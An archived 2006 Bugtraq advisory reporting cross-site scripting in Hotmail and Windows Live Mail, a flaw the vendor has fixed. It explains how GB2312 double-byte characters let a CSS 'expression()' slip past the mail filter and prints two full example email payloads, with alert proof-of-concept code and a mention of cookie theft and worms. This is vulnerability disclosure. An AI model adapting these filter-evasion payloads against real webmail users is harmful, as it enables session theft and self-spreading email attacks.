lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061103153902.5766.qmail@securityfocus.com>
Date: 3 Nov 2006 15:39:02 -0000
From: applesoup@...il.com
To: bugtraq@...urityfocus.com
Subject: Hotmail and Windows Live Mail XSS Vulnerabilities


Adivisory Name : Hotmail and Windows Live Mail XSS Vulnerabilities 
Release Date : 2006.11.03
Test On : Microsoft IE 6.0
Discover : Cheng Peng Su(applesoup_at_gmail.com)

Introduction:
Hotmail and Windows Live Mail are both web-based e-mail services by Microsoft. 

Details:

Hotmail's filter identifies "expression()" syntax in a CSS attribute. According to Hasegawa Yosuke's post(http://archive.openmya.devnull.jp/2006.08/msg00369.html), in some character encodings(e.g. GB2312), we can substitute some special double-byte chars for the corresponding chars in "expression()". In this case, we can create a malformed CSS attribute, which Hotmail's filter fails to inspect and filter the "expression()" syntax.

An example:

Hotmail
--------------------------------------------------
MIME-Version: 1.0
From: user<user@...e.com>
Content-Type: text/html; charset=GB2312
Subject: example

<img id='sss'>
<input id='ttt' value="javascript:alert('xss')">
<span style="font-family:[ascii 163][asii 197]xpression[ascii 163][ascii 168]document.all.sss.src=document.all.ttt.value)">exploited</span>
.
--------------------------------------------------

Windows Live Mail
--------------------------------------------------
MIME-Version: 1.0
From: user<user@...e.com>
Content-Type: text/html; charset=GB2312
Subject: example

<img id='sss'>
<input id='ttt' value="javascript:alert('xss')">
<span style="font-family:[ascii 163][asii 197]xpression[ascii 163][ascii 168]document.all.EC_sss.src=document.all.EC_ttt.value)">exploited</span>
.
--------------------------------------------------

the injected code inside the CSS attribute is responsible for
-Getting cookies.
-Potential web-based e-mail worm.

Vender status:

Microsoft was notified on Sep 25th, 2006. 
The bug is now fixed. 

Original advisory:

http://applesoup.googlepages.com/hotmail_xss.txt

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ